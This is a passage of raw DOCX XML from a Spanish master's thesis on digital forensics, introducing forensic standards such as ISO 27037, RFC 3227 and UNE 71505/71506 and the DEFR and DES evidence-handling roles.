        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Realizar unas conclusiones acordes a todo el TFM realizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A28590E" w14:textId="23351BD2"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Basarse en ideas fuerza que han aparecido durante todo el TFM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217EF700" w14:textId="6DADBBB7" w:rsidR="002135A8"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 xml:space="preserve">Tener en cuenta que este apartado es el que finalmente, el gerente de la empresa, como miembro directivo de la misma, usando el método del </w:t>
      </w:r>
      <w:r w:rsidR="00696354" w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>presidente</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reagan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DCC784" w14:textId="77777777" w:rsidR="002135A8" w:rsidRDefault="002135A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6668EB38" w14:textId="61F85CEC" w:rsidR="00F149F6" w:rsidRDefault="00F149F6" w:rsidP="00F149F6">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc155782498"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r w:rsidR="00B83DD2">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B83DD2">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Metodologías</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="4ED003DD" w14:textId="77777777" w:rsidR="00F149F6" w:rsidRDefault="00F149F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB19FC8" w14:textId="4DEE2385" w:rsidR="00B83DD2" w:rsidRPr="00B83DD2" w:rsidRDefault="00B83DD2" w:rsidP="00B83DD2">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83DD2">
        <w:t>Introducción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BCE8B2" w14:textId="77777777" w:rsidR="00F149F6" w:rsidRPr="00D504A6" w:rsidRDefault="00F149F6" w:rsidP="00F149F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>En esta sección se procederá a realizar un repaso general de algunas de las normativas y estándares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA93DE" w14:textId="6760DF4C" w:rsidR="00F149F6" w:rsidRPr="00D16863" w:rsidRDefault="00F149F6" w:rsidP="00F149F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Primero abordaremos un pequeño estudio relativo a las normas ISO</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>ISO (International Organization for Standardization): Organización que desarrolla y publica estándares internacionales.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 27037 e ISO 30131, posteriormente abordaremos la </w:t>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>normativa RFC</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>RFC (Request for Comments): Documentos que describen métodos, comportamientos, investigaciones o innovaciones aplicables a la operación de Internet y sistemas conectados."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3227 para finalmente comentar un resumen de las normas UNE 71505 y UNE 71506.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7A7715" w14:textId="5EEA9398" w:rsidR="00F149F6" w:rsidRPr="00D504A6" w:rsidRDefault="00F149F6" w:rsidP="00F149F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Por </w:t>
      </w:r>
      <w:r w:rsidR="00696354" w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>último</w:t>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, pero no menos importante, trataré unas conclusiones sobre esta sección.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A868C2" w14:textId="3566C5BD" w:rsidR="00F149F6" w:rsidRDefault="00B83DD2" w:rsidP="00B83DD2">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83DD2">
        <w:t>Normas ISO</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:instrText>ISO (International Organization for Standardization): Organización que desarrolla y publica estándares internacionales.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B83DD2">
        <w:t xml:space="preserve"> 27037 e ISO 30121.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6499DA55" w14:textId="6F605E87" w:rsidR="00DE5C26" w:rsidRPr="00DE5C26" w:rsidRDefault="00DE5C26" w:rsidP="00DE5C26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155731606 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia IV.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="000348FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155731707 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia V.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A94FB6E" w14:textId="4680BA13" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6" w:rsidP="00D504A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dentro de la seguridad informática cabe destacar una normativa ampliamente conocida, es la familia ISO</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>ISO (International Organization for Standardization): Organización que desarrolla y publica estándares internacionales.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 27000. Esta serie de normas son estándares de seguridad publicados por la Organización Internacional para la Estandarización (ISO) y la Comisión Electrotécnica Internacional (IEC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAE2A2B" w14:textId="77777777" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6" w:rsidP="00D504A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Esta serie contiene diversas normas todas relacionadas con las mejores prácticas recomendadas en Seguridad de la Información para desarrollar, implementar y mantener especificaciones para los Sistemas de Gestión de la Seguridad de la Información (SGSI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA3D8BF" w14:textId="5371630B" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6" w:rsidP="00D504A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Concretamente, existe una norma dedicada en exclusiva al análisis forense, se trata de la ISO</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>ISO (International Organization for Standardization): Organización que desarrolla y publica estándares internacionales.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 27037 Directrices para la identificación, recolección, adquisición y preservación de la prueba digital.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3324A5" w14:textId="7A91A0F5" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6" w:rsidP="00D504A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta norma ofrece orientación para tratar situaciones frecuentes durante todo el proceso de tratamiento de las pruebas digitales. </w:t>
      </w:r>
      <w:r w:rsidR="00696354" w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Además,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> define dos roles especialistas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A75728" w14:textId="30F9405A" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">DEFR </w:t>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(Digital </w:t>
      </w:r>
      <w:r w:rsidRPr="008A7329">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Evidence First Responders</w:t>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: Expertos en primera intervención de evidencias electrónicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C76690" w14:textId="49D94301" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DES</w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A7329">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="008A7329">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="008A7329">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>igital Evidence Specialists</w:t>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: Experto en gestión de evidencias electrónicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40738A29" w14:textId="75364DCF" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6" w:rsidP="00D504A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ISO</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
